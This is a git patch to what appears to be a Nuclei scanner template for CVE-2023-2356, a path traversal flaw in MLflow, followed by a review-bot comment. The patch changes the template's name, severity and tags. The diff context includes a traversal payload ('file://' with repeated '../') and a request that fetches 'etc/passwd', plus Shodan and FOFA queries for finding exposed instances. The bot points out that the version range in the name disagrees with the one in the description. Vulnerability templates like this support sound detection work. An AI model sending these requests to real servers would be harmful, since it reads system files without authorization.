From 717a7410d94dddef3f6d7c07ad1a39037c2c26b3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 23 May 2023 12:02:34 +0530
Subject: [PATCH] severity & name -updated
---
 http/cves/2023/CVE-2023-2356.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml
index b546ed3b5b..8938fb957c 100644
--- a/http/cves/2023/CVE-2023-2356.yaml
+++ b/http/cves/2023/CVE-2023-2356.yaml
@@ -1,9 +1,9 @@
 id: CVE-2023-2356
 info:
- name: Mlflow 5.2.5 - Local File Inclusion
+ name: Mlflow <2.3.0 - Local File Inclusion
 author: Co5mos
- severity: critical
+ severity: high
 description: |
 Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
 reference:
@@ -15,10 +15,10 @@ info:
 cve-id: CVE-2023-2356
 cwe-id: CWE-23
 metadata:
+ verified: "true"
 shodan-query: http.title:"mlflow"
 fofa-query: app="MLflow"
- verified: "true"
- tags: cve,cve2023,lfi,huntr,mlflow
+ tags: cve,cve2023,lfi,huntr,mlflow,oss
 variables:
 str: "{{rand_base(6)}}"
@@ -37,7 +37,7 @@ http:
 Host: {{Hostname}}
 Content-Type: application/json
- {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
+ {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
 - |
 GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1
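Review bot: The new `name` in the first hunk (`@@ -1,9 +1,9 @@`) gives the affected range as `<2.3.0`, while the unchanged `description` two lines below says the flaw exists "prior to 2.3.1", so the two disagree by one release. The name is what appears in scan output, so someone triaging a result against a 2.3.0 deployment could wrongly conclude that version is out of range. Confirm the fixed version against the advisory in the `reference` list (its entries lie outside the hunk) and align the two fields, e.g. `name: MLflow < 2.3.1 - Local File Inclusion` if the description is the correct one. The drop from `critical` to `high` should likewise be checked against the `cvss-score` in the `classification` block, which is not visible in this hunk.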